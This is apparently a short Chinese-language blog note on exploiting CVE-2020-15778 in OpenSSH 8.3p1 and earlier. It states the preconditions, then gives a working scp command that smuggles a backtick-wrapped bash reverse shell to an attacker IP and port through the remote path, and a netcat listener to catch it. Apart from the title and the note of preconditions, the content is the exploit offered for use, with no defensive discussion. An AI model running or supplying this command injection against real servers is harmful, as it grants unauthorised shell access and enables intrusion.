【笔记】CVE-2020-15778漏洞利用 发表于 2024-06-15 更新于 2025-12-19 阅读次数: 前言采用OpenSSH作为SSH服务端的服务器,在已知用户名和密码的情况下,如果允许了scp命令,但不允许通过ssh命令远程登录,可以利用scp命令反弹Shell 漏洞利用前提 OpenSSH <= 8.3.p1 exp <file>:随便一个本地文件<ip>:攻击者IP地址<port>:攻击者端口号 1scp <file> <username>@<password>:'`bash -i >& /dev/tcp/<ip>/<port> 0>&1`x' 监听反弹Shell 1nc -lvp <port> 完成参考文献哔哩哔哩——xiaodisec